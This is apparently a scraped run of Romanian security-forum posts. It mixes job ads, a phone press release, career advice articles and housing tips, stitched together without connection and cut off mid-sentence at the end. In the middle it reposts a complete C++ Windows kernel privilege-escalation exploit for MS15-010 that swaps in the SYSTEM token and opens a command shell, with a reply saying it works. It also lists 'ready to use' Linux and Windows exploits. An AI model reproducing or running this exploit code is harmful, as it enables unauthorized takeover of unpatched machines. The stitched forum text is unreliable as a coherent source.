Nytro

@saber05 - Unul sau doua, depinde. @ManutaDeAur - Haide la noi si plateste firma.

Anuntul e si pe BestJobs daca nu vreti sa trimiteti CV-ul pe PM: IT Security Consultant (Penetration Tester) la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Allview prezint? X2 Xtreme, noul s?u vârf de gam? smartphone Aurelian Mihai - 9 iun 2015 X2 Xtreme este un smartphone dual-SIM motorizat de chipsetul Helio X10 (CPU octa-core pe 64 bi?i, la 2GHz), ajutat cu 3GB memorie RAM. Dispozitivul beneficiaz? de tehnologia CorePilot 2.0 si folose?te sistemul de operare Android 5.1 Lollipop. Piesa de rezisten?? este îns? memoria intern? de 64GB care poate fi extinsa pana la 192GB prin adaugarea unui card microSD de maxim 128GB Allview X2 Xtreme „Continuam sa oferim consumatorilor produse adaptate cerintelor si asteptarilor tot mai diversificate, prin inovatie si cercetare constanta. Am pastrat totodata si traditia de a aduce in gama Soul un smartphone cu performante extreme. Avand in vedere tendintele si necesitatile utilizatorilor care isi doresc un smartphone cu specificatii la superlativ. Printre acestea de remarcat sunt: camera principala de 24 MP care prin intermediul unui algoritm de suprapunere a imaginilor poate oferi o rezolutie incredibila pe care insa o pastram sub forma de surpriza pana la aparitia primelor review-uri, mediul de stocare de pana la 192 GB care te ajuta in a captura filme la rezolutie de 4K, display-ul de 6” cu rezolutie Quad HD, procesorul Helio X10 si autonomia de peste 200 ore in convorbire in modul Extrem” a declarat Lucian Peticila, director general al companiei Visual Fan. Vârful gamei de telefoane Soul include sistem de deblocare pe baz? de amprent?, oferind un nivel sporit de protec?ie a datelor. Pe lâng? deblocarea ecranului, utilizatorul poate apela la folosirea amprentei pentru a cripta fi?iere. zoom in Allview X2 Xtreme ofer? dou? camere foto de 8MP ?i 24MP, camera principala dispunând de lentile cu 6 straturi(UV lens, focus lens, high precision lens, aperture, low dispersion lens) si protec?ie anti-zgârieturi cu strat de Safir. De remarcat este ?i blitz-ul LED cu dou? tonalit??i de lumin? - „cald?” si „rece”, conferind pozelor un aspect natural ?i palet? mai bogat? de culori. Telefonul poate filma la rezolu?ie 4K, respectiv captura imagini in timpul film?rii prin utilizarea butonului prezent pe rama telefonului. Al?turi de camera foto, cap de afi? pe lista specifica?iilor este ?i ecranul cu diagonal? 6? ?i rezolu?ie QHD (2560x1440). Utilizatorii pot alege oricare din temele smartphone-ului X2 Xtreme, respectiv functia Chameleon care adapteaz? interfa?a telefonului duplicând culorile din jurul t?u. Smartphone-ul este echipat cu o baterie de 3500 mAh care promite pana la 20 ore de func?ionare continua sau 350 ore in stand-by. X2. Telefonul Allview X2 Xtreme este disponibil începând de ast?zi pe baz? de precomand?, la pre?ul de 2199 LEI. Sursa: Allview prezint? X2 Xtreme, noul s?u vârf de gam? smartphone

Cred ca e ok sa completati ceva la intamplare daca nu aveti. Eu cred ca o sa aleaga persoane (cele 50) si in functie de Linkedin si de Github. Adica na, probabil daca sunt interesati si sa angajeze, vor sa aleaga persoane "ok". Sau cel putin sa ramana cu niste date de contact.

WHAT THE HACK?! 12 ORE, 20 DE CHALLENGE-URI, 2500EURO IN PREMII SI DOAR 50 DE PARTICIPANTI. CAND 21 Iunie 2015 Incepand cu 10am UNDE WELOVEDIGITAL Bulevardul Dacia, nr. 30, cl?direa Mecano Locurile sunt limitate INSCRIE-TE ACUM Link: http://whatthehack.net/

The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio - the development environment and Microsoft SQL Server - the data storage engine. Responsibilities: Building new systems with ASP.MVC , ASP.NET , SQL Server 2008/ 2012 , EntityFramework and Linq Developing new functionality on our existing software products Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations Participating in a small, experienced, energetic development team. Requirements: Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures – minimum 4 years of experience Web development experience (ASP.MVC ,ASP.NET, Java script, AJAX, CSS, JSON, JQUERY); - minimum 4 years of experience Very good knowledge of T-SQL and relational database design; - minimum 4 years of experience Graduate of Computer Science/Cybernetics/Information Technology/Electronics College; Fluent in English; Ability and willingness to work as part of a team of developers; Learning oriented person. Additional advantage: Active Reports, SQL Reporting Services Java & Install Shield knowledge Active Directory knowledge Knowledge of WCF Web Services, WCF Data Services Pentru mai multe informatii sau aplicare, astept un PM.

Din pacate nu se poate lucra remote. Astept CV-urile persoanelor interesate. Proiectele garantez ca o sa va placa.

Cauta pe cineva si stati intr-un apartament cu doua camere. Ar veni 150 de euro de persoana intr-un apartament ok, in zona ok. Si intretinerea si cheltuielile s-ar imparti la 2. Ar trebui sa te descurci.

Chiria e costul principal, depinde in ce zona si cate camere. Garsoniere - 200-250 euro, 2 camere - 250-350 euro. Fata de viata cu parintii mai sunt: intretinerea, curentul, netul... Daca mai stai cu cineva, costurile se impart. Iar mancarea si bautura, iesirile in oras etc. depind de fiecare in parte.

So You Want To Be A Malware Analyst September 18, 2012 | BY Adam Kujawa In war, there are always two sides: the attackers and the defenders. A less focused on group is the researchers and developers. While soldiers are fighting a war on the front lines, scientists and engineers are researching and developing new weapons, defenses and tools; things that give their side an advantage. If one of these such creations is ever captured by the opposing forces, it is reverse engineered to understand exactly how it works, how it can be defended against and even how to re-purpose it. The same goes for war on the cyber front, malicious attackers and system administrators (Black and White Hats) are the soldiers, malware authors develop new and dangerous forms of malware and Malware Analysts reverse engineer these weapons to find out how to stop them. What is a Malware Analyst? A Malware Analyst is a highly specialized reverse-engineer, programmer and detective. They accomplish their task by using various tools and expert level knowledge to understand not only what a particular piece of malware can do but also how it does it. Becoming a Malware Analyst requires a large amount of focus and discipline as well as training and practice of the inner workings of computer systems, programming methodologies in multiple languages and a keen mind for solving puzzles and connecting the dots. You might consider becoming a Malware Analyst if you have a passion for computer security, enjoy solving puzzles and like the prospect of always learning new things. You might also enjoy it if you prefer a profession that always poses a challenge or if you look forward to working on new and interesting things. No day is ever the same as the previous, everyday is an opportunity to learn something new and fine-tune your skills. In addition to the personal satisfaction you would get from being a Malware Analyst, you would also become a samurai in the fight to make the cyber world a safer place. The type of person who would be perfect for becoming a Malware Analyst would be: A fast learner Able to derive meaning from nonsense A good puzzle solver Able to think outside of the box Willing to frequently use the scientific method Resourceful Prerequisites Prior to walking the path to become a Malware Analyst, a person should be familiar with: Operating System Concepts High Level & Low Level Programming (familiarity is fine, working knowledge not required at first) Fundamentals of networking How to use the internet to perform research Building the basics Being a Malware Analyst can take you many different places during your career and you can end up analyzing all types of malware, from normal application malware to exploits hidden in PDF files or malware found on smart phones. So where should you start when it comes to your training? You should master a few basics before trying anything too advanced: Learn Assembly Language In the hierarchy of programming languages, you have at the very top scripting languages like PERL or Python, followed by high and middle level languages like C++, C. Followed down by Assembly language, machine language and finally binary code which is read by the hardware. Most malware is written in a Middle Level language and once the code is completed, it is compiled all the way down so it can be read by the hardware and/or operating system. At this level, the code is not “Human Readable” or easily read by human eyes. In order for a Malware Analyst to be able to read the malware code, they will need to disassemble it. Unfortunately, the highest language derived from binary code is Assembly, which is the last level of human readable code. Therefore, it is imperative that a would-be Malware Analyst, also learn how to read and write Assembly code. Assembly language is low-level and therefore involves many more instructions than you would see in a higher-level program. For example, the code required to print something in the console in a higher-level languages is usually just one line and sometimes just one symbol. In Assembly, this simple procedure may require anywhere from 5 to 20 lines of code. Analysts Tip: Learning Assembly is easy if you already know a higher-level language, imagine what the operating system needs to do in order for a single function call to execute, this is what you will see in Assembly. By learning shortcuts to parsing Assembly, you will find what you are looking for much faster. Learn how to use the tools As a construction worker needs to know how to use a hammer and a mechanic needs to know how to use a wrench, a Malware Analyst needs to know to work their own set of unique and powerful tools. Some tools are easy to use and some are not, some have clear output and some dump you with lots of data that you need to be able to parse. The tools of a Malware Analyst are incredibly important and usually one of the first things learned. Here is a list of the types of tools required and some examples of them: Dissasembler – IDA Pro Debugger – OllyDbg, WinDbg System Monitor – Process Monitor, RegShot. Process Explorer Network Monitor – TCP View, Wireshark Packer Identifier – PEID Unpacking Tools – Qunpack. GUNPacker Binary Analysis Tools – PE Explorer, Malcode Analysts Pack Code Analysis Tools – LordPE, ImpRec Once you learn how the tools work and what you could do with them, your quest in analyzing malware will become easier and easier. Also, keep in mind that while you might originally learn how to use a specific suite of tools, new tools are being developed all the time that might be more helpful in both their design and function. Learn about malware Learning about malware might seem a bit redundant when you are training to become a Malware Analyst; however, it is a very important aspect of your training. Malware evolves and changes every year, it uses new methods to infect as well as operate and sometimes brings back old methods if they are applicable again. If you were writing a program to play Tic-Tac-Toe, you could try to write it from scratch, or you could see how other people have written it before and get an idea of what you need to do. The same applies for malware analysis; reading white papers and analysis reports about different types of malware will give you an idea of what you might be seeing while reversing. Process injection is a method that malware uses to hide its operations, it must go through a set of functions in order to perform this technique and it is important that you be able to identify it happening in the code based upon prior experience and knowledge about how malware works. Research, practice, knowledge and experience are key to being able to effectively analyze new malware and should be the staples of your Malware Analyst training. Helpful Links and Sources There are many different ways to learn about becoming a Malware Analyst; some people choose to go through courses taught online or in person, which can cost upwards of a few thousand dollars. Other people choose to learn as they go, picking up information where they can and learning from their own experience. Both are decent ways of learning about malware analysis but the cheap and easy way would be through doing online research and reading lots of books. Here is a list of my favorite sources for learning about malware analysis: Online Sources: Tuts4You.com Tutorials Sans.org and anything by Lenny Zeltser Google Searches for “Malware Analysis <specific topic>” Books: Malware Analyst’s Cookbook Rootkits: Subverting the Windows Kernel Practical Malware Analysis The IDA Pro Book Reversing: Secrets of Reverse Engineering Conclusion Whether it is to start a new career or just simple curiosity, learning about Malware Analysis can be a very challenging and rewarding path. It can test your patience, concentration and sometimes even your temper, but the payoff when you have been working on a file for hours and finally come across the key function or piece of data you were looking for, cannot be duplicated by anything else. The future holds a war between those who use malware and those who fight against it and as technology advances, so too does the methods in which malware authors write programs to exploit and control it. The next generation of malware fighters will require a more advanced knowledge than ever before they will be the cyber samurai. Sursa: https://blog.malwarebytes.org/intelligence/2012/09/so-you-want-to-be-a-malware-analyst/

IT Security Consultant (Penetration Tester/ Ethical Hacker) Job profile: Conducting technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits. Identifying and exploiting technical vulnerabilities in clients’ systems, assessing the business risks of the technical vulnerabilities and communicating these to the client. Performing security configuration analysis for various operating systems, especially Windows and Linux / UNIX. The successful candidate will have the ability to learn quickly and work with new technologies, tools and techniques. Some typical projects that you will work on (depending on your expertise) could be: Web application penetration testing: trying to find vulnerabilities in web applications (e.g. Internet Banking, eCommerce websites, web portals, etc.) and reporting them to clients. Trying to exploit these vulnerabilities to assess their impact on the business. Internal network penetration testing: simulating a malicious person who already has access to the internal network of the customer (e.g. a visitor, consultant, etc.). Starting only from a simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags. Mobile application penetration testing: trying to find vulnerabilities in mobile applications (Android, iOS, and Windows phone) and suggesting corrective measures to improve their security. You may also be involved in other types of technical project that will involve your imagination and out-of-the-box thinking, as well as giving demonstrations and presentations to clients. We encourage technical research and presentation of our results to local and international hacking conferences. Specific requirements Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development. We expect you to be familiar with OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, wireshark, nmap, Linux shell commands, Kali and others. You must also be able to express your findings in very good technical and business English (oral and written). Further requirements: - Bachelor’s degree in an IT related field. - Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development. - Ability to work effectively either individually or as a member of a multi-skilled team. - Professional discipline, accuracy, reliability and excellent analytical skills. - Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation. Certifications such as OSCP, OSCE, CEH, LPT, CCNA, MCSE will be considered an advantage. Our Offer A competitive salary and benefits package. The chance to develop a rewarding professional path and work on challenging assignments. Support for professional qualifications and personal development through a strong mentoring program. Work in a friendly team of security professionals who enjoy sharing their experience with colleagues. The opportunity to participate in a wide variety of technical projects and client environments. Flexible working program. Nota: Daca sunteti interesati, astept CV-ul vostru in PM.

[h=1]Microsoft Windows - Local Privilege Escalation (MS15-010)[/h] // ex.cpp /* Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP CVE-2015-0003 March 2015 (Public Release: May 24, 2015) Tested on: x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 x64: Win 2k8 SP1 | Win 2k8 R2 SP1 Author: Skylake - skylake <at> mail <dot> com */ #include "ex.h" _ZwAllocateVirtualMemory ZwAllocateVirtualMemory; _PsLookupProcessByProcessId PsLookupProcessByProcessId; _PsReferencePrimaryToken PsReferencePrimaryToken; DWORD Pid; ATOM atom; BOOL KrnlMode, bSpawned; DWORD_PTR WINAPI pti() { #ifdef _M_X64 LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); #else LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); #endif } BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) { DWORD_PTR dwIndex, dwMask; #ifdef _M_X64 dwMask = ~0xf; #else dwMask = ~7; #endif // dwCurrentValue &= dwMask; for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) { if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) { // pdwStructure[dwIndex] = dwNewValue; return TRUE; } } return FALSE; } BOOL WINAPI Init() { HMODULE hMod = NULL; PVOID Base = NULL; OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; PSYSTEM_MODULE_INFORMATION pm = NULL; BOOL RetVal = FALSE; __try { if( !GetVersionEx( &ov ) ) __leave; if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) { atom = 0xc039; } else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) { atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a; } if( !atom ) __leave; _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); if( !ZwQuerySystemInformation ) __leave; ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); if( !ZwAllocateVirtualMemory ) __leave; ULONG len; LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); if( !status ) __leave; pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); if( !pm ) __leave; status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); if( status ) __leave; CHAR szKrnl[MAX_PATH] = { 0 }, *t; for( ULONG i = 0; i < pm->Count; ++i ) { if( strstr( pm->Module[i].ImageName, "exe" ) ) { t = strstr( pm->Module[i].ImageName, "nt" ); if( t ) { strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); Base = pm->Module[i].Base; break; } } } hMod = LoadLibraryA( szKrnl ); if( !hMod || !Base ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); if( !PsLookupProcessByProcessId ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); if( !PsReferencePrimaryToken ) __leave; PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); Pid = GetCurrentProcessId(); RetVal = TRUE; } __finally { if( pm ) LocalFree( pm ); if( hMod ) FreeLibrary( hMod ); } return RetVal; } LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) { LPVOID pCurProcess = NULL; LPVOID pSystemInfo = NULL; PACCESS_TOKEN systemToken; PACCESS_TOKEN targetToken; PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); targetToken = PsReferencePrimaryToken( pCurProcess ); systemToken = PsReferencePrimaryToken( pSystemInfo ); // find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 ); KrnlMode = TRUE; return 0; } VOID WINAPI leave() { keybd_event( VK_ESCAPE, 0, 0, NULL ); keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); } LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) { if( bSpawned ) { leave(); ExitProcess( 0 ); } switch( message ) { case WM_CREATE: SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); FlashWindow( hWnd, TRUE ); keybd_event( VK_LWIN, 0, 0, NULL ); break; case WM_CLOSE: DestroyWindow( hWnd ); break; case WM_DESTROY: PostQuitMessage( 0 ); break; case WM_TIMER: KillTimer( hWnd, ID_TIMER ); leave(); DestroyWindow( hWnd ); break; default: return DefWindowProc( hWnd, message, wParam, lParam ); } return 0; } int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow ) { WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; HWND hWnd = NULL; MSG Msg = { 0 }; SIZE_T size = 0x1000; LPVOID addr = ( LPVOID ) 1; if( !Init() ) return 1; if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) { // return 1; } DWORD_PTR p = pti(); if( !p ) return 1; #ifdef _M_X64 *( ( PDWORD_PTR ) 0x10 ) = p; *( ( LPBYTE ) 0x2a ) = 4; *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; *( ( PDWORD_PTR ) 0xa8 ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( PDWORD_PTR ) 0x408 ) = 0x800; *( ( LPWORD ) 0x410 ) = atom; *( ( LPBYTE ) 0x412 ) = 1; #else *( ( LPDWORD ) 0x08 ) = p; *( ( LPBYTE ) 0x16 ) = 4; *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; *( ( LPDWORD ) 0x6c ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( LPDWORD ) 0x408 ) = 0x800; *( ( LPWORD ) 0x40c ) = atom; *( ( LPBYTE ) 0x40e ) = 1; #endif wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = TEXT( "Class" ); if( !RegisterClassEx( &wc ) ) return 1; hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL ); if( !hWnd ) return 1; ShowWindow( hWnd, SW_HIDE ); UpdateWindow( hWnd ); while( GetMessage( &Msg, NULL, 0, 0 ) ) { if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 { if( !KrnlMode ) { Msg.hwnd = ( HWND ) NULL; } else { Msg.hwnd = hWnd; if( !bSpawned ) { ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); bSpawned = TRUE; } } } TranslateMessage( &Msg ); DispatchMessage( &Msg ); } return ( int ) Msg.wParam; } // EOF //ex.h #pragma once #include <windows.h> #include <stdio.h> #include <tchar.h> typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect ); typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process ); typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process ); typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemModuleInformation = 11 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { HANDLE Section; PVOID MappedBase; PVOID Base; ULONG Size; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; #define ID_TIMER 0x1 #define WM_SYSTIMER 0x118 // EOF Sursa: https://www.exploit-db.com/exploits/37098/

Nasol. Era o optiune de migrare de la vBulletin.

Incomplet. $id = $_GET[‘id’]; $id = mysql_real_escape_string($id); $query = "SELECT camp1,camp2 FROM tabel WHERE id=". $id; Vulnerabil cat casa. PS: Exista prepared statements aka metoda eficienta de protejare.

"cam tot ce se face la liceu, pana in clasa a12a" - La liceu se face algoritmica, nu C++. C++ e ala cu clase, mostenire... Ai facut asa ceva? "- Cum a fost primul interviu al vostru ( aici, nu ma refer strict la C++ ) ?" - A fost interesant. Urmatoarele 10 l-au facut sa para plictisitor. "- Cum trebuie sa te pregatesti pentru interviu?" - E mai important sa stii ce face firma respectiva, ce fel de proiecte si cateva detalii despre ea, decat sa inveti niste intrebari tehnice pe de rost. Daca face soft de network, o sa fie intrebari de network. (aka sockets) "- Ce intrebari ti se pun (ma refer la complexitatea intrebarilor)?" - De limbaj si de algoritmica. Unele mai simple, altele mai complicate. Vezi ca mai sunt ceva posturi care detaliaza acest aspect. "- Ca progamator, ce importanta mai are facultatea in ziua de azi" - Are importanta. In facultate esti cel putin fortat sa inveti anumite lucruri pe care nu le inveti de capul tau. Iar sansele sa te cheme la interviu sunt mult mai mici daca nu ai facultate. Da, nu ar trebui sa fie un criteriu de baza in procesul de selectie, dar se tine cont. Poti face o facultate la ID si scapi. Vezi si: - https://rstforums.com/forum/97721-pareri-interviu-bitdefender.rst?highlight=interviu - https://rstforums.com/forum/98082-pareri-interviu-web-developer-programator-php.rst?highlight=interviu - https://rstforums.com/forum/79626-interviu-de-angajare.rst?highlight=interviu

Simplu si eficient.

Am cunoscut/cunosc persoane din echipa de pentesteri de la EA si sunt foarte ok. Evitati comentariile inutile.

"Excellent verbal, written, and interpersonal skills and professionalism in dealing with all levels of management and staff" Nu e pentru tine

Awesome. Too bad it is not for Windows (8-10) Heap Manager. https://media.blackhat.com/bh-us-12/Briefings/Valasek/BH_US_12_Valasek_Windows_8_Heap_Internals_Slides.pdf

Noi futem pe voi, noi futem pe steag vostru, noi futem pe Ponta. Muie.

Testat pe Windows 7 - x64. Merge. Haideti, comentatorilor, nu va plangeti ca posteaza porcarii?

Super

[h=1]exploits[/h] Exploits that are mostly ready to use. They either require no modification or have been modified and verified as functional. To check md5sum in linux, type md5sum -c md5sum.txt [h=3][/h][h=3]Linux[/h] [TABLE] [TR] [TH=align: left]Where[/TH] [TH=align: left]Type[/TH] [TH=align: left]Platform[/TH] [TH=align: left]Sploit[/TH] [TH=align: left]Dir[/TH] [TH=align: left]Lang[/TH] [/TR] [TR] [TD=align: left]Both[/TD] [TD=align: left]Exploit Finder[/TD] [TD=align: left]Linux[/TD] [TD=align: left]n/a[/TD] [TD=align: left]/lin/suggest_exploit.pl[/TD] [TD=align: left]Perl[/TD] [/TR] [TR] [TD=align: left]Both[/TD] [TD=align: left]Priv Esc[/TD] [TD=align: left]Linux[/TD] [TD=align: left]Exim 4.69[/TD] [TD=align: left]/lin/pe-exim4[/TD] [TD=align: left]Perl[/TD] [/TR] [TR] [TD=align: left]Local[/TD] [TD=align: left]Priv Esc[/TD] [TD=align: left]Linux[/TD] [TD=align: left]Kernel <= 2.6.36-rc8[/TD] [TD=align: left]/lin/pe-kernel-rds[/TD] [TD=align: left]C[/TD] [/TR] [TR] [TD=align: left]Local[/TD] [TD=align: left]Priv Esc[/TD] [TD=align: left]Linux[/TD] [TD=align: left]Kernel <= 3.2.2[/TD] [TD=align: left]/lin/pe-memodipper[/TD] [TD=align: left]C[/TD] [/TR] [/TABLE] [h=3][/h][h=3]Windows[/h] [TABLE] [TR] [TH=align: left]Where[/TH] [TH=align: left]Type[/TH] [TH=align: left]Platform[/TH] [TH=align: left]Sploit[/TH] [TH=align: left]Dir[/TH] [TH=align: left]Lang[/TH] [/TR] [TR] [TD=align: left]Remote[/TD] [TD=align: left]Buffer Overflow[/TD] [TD=align: left]Windows XP SP2[/TD] [TD=align: left]War-FTP 1.65[/TD] [TD=align: left]/win/bof-warftp[/TD] [TD=align: left]Python[/TD] [/TR] [TR] [TD=align: left]Remote[/TD] [TD=align: left]Buffer Overflow[/TD] [TD=align: left]Windows XP SP1[/TD] [TD=align: left]CesarFTP 0.99g[/TD] [TD=align: left]/win/bof-cesarftp[/TD] [TD=align: left]Python[/TD] [/TR] [TR] [TD=align: left]Remote[/TD] [TD=align: left]Buffer Overflow[/TD] [TD=align: left]Windows 7 SP1 - 6.1.7601[/TD] [TD=align: left]SL Mail[/TD] [TD=align: left]/win/slmail[/TD] [TD=align: left]Python[/TD] [/TR] [TR] [TD=align: left]Local[/TD] [TD=align: left]Priv Esc[/TD] [TD=align: left]Windows (all up to 7 SP1?)[/TD] [TD=align: left]KiTrap0D[/TD] [TD=align: left]/win/pe-kitrap[/TD] [TD=align: left]v C++[/TD] [/TR] [TR] [TD=align: left]Local[/TD] [TD=align: left]Priv Esc[/TD] [TD=align: left]Windows (2k XP 03 - all)[/TD] [TD=align: left]keybd_event[/TD] [TD=align: left]/win/pe-keybd-event[/TD] [TD=align: left]C[/TD] [/TR] [TR] [TD=align: left]Local[/TD] [TD=align: left]Priv Esc[/TD] [TD=align: left]Windows (XP SP3 & 03 SP2/3)[/TD] [TD=align: left]AFD.sys[/TD] [TD=align: left]/win/pe-afd[/TD] [TD=align: left]Python .exe[/TD] [/TR] [/TABLE] [h=3]To-do[/h] [TABLE] [TR] [TH=align: left]Where[/TH] [TH=align: left]Type[/TH] [TH=align: left]Platform[/TH] [TH=align: left]Sploit[/TH] [TH=align: left]Dir[/TH] [TH=align: left]Lang[/TH] [/TR] [TR] [TD=align: left]x[/TD] [TD=align: left]x[/TD] [TD=align: left]x[/TD] [TD=align: left]x[/TD] [TD=align: left]x[/TD] [TD=align: left]x[/TD] [/TR] [/TABLE] Sursa: https://github.com/tresacton/exploits

10 Tips for Aspiring Security Professionals Nobody enters a new profession as an expert. The information security industry is so lucrative right now that schools are now implementing Information Security programs. As some of you may know, I am currently 22 years old and about to graduate college with a degree in Information Security. I will be the very first to say that after 4 years in a program tailored to security, I have learned nothing that will ever directly apply to a job in Information Security. You may ask “How is that possible?”. The answer is simple. These degrees don’t teach you skills that you will use in the field, they teach you how to think critically, problem solve and most importantly, they teach you how to learn. I am going through the same process that thousands of students (and others) are going through. Information Security is scary, overwhelming and fast paced. As someone entering the industry (especially if you are young), you have A LOT of catch up to do. Not only do you have to learn and understand current attacker methodology and techniques, you have to learn past methodologies and techniques as well. Combine this with the need to learn scripting, programming, networking, protocols, etc. and you will find yourself stressed out and overwhelmed. I have encountered this first hand and am even going through it as I write this and because of that, I want to give a few tips to those either entering the industry or thinking about entering the industry. 1. Passion is essential “If you love what you do, you’ll never have to work a day in your life” This says it all. Learning concepts isn’t hard when you want to learn it. Same goes for applying those concepts. If you have passion toward information security, you are miles ahead of the majority of other folks in the industry. There are a lot of people that do this job because of the money. I can honestly say that I would remain in the information security/offensive security industry if it paid minimum wage. The job is easy if you love it. 2. Never Stop Learning Concepts, technology and methodology will always be changing. Not only do you have to learn the past, but you have to learn the present and the future. Be a sponge and absorb every little bit of information that you can. 3. Learn the basics First, learn the basics of computers, networking and programming. If you have a genuine passion for computers, this will be easy. I recommend getting a job doing helpdesk or general systems administration. For example: I started working the helpdesk at a small company my sophomore year in college. All I did was fix monitors, printers and basic networking issues. After two years, I got a new job working the helpdesk and doing sysadmin work for a larger company. This gave me the opportunity to branch out and learn how a corporate network is setup and functions. I was able to learn the ins and outs of a domain and how it operates. With the basic understanding of how things work, you can then branch out into how to break them. Without this basic understanding, it will be hard to operate with an offensive (or defensive) mindset. 4. Dive in From my experience, the only way to learn is to just jump in the deep end. Get in the weeds of things going on, even if you don’t understand it. The security industry is excellent at mentoring, so find few people and stick by them. Most of the security professionals understand that by investing in you, they will help bring up an additional professional in an industry that is in desperate need of passionate professionals. 5. Contribute As I stated above, get in the weeds of things, even if you don’t understand it. There are TONS of open source projects and tools out there. Find some that interest you and try to contribute. Or, even better, start your own research. Contribute to the community by completing and sharing some of your own work. For example: When I first started, I had a massive interest in client side attacks. I started researching different client side attacks and in 2013, I found an old article from 2003 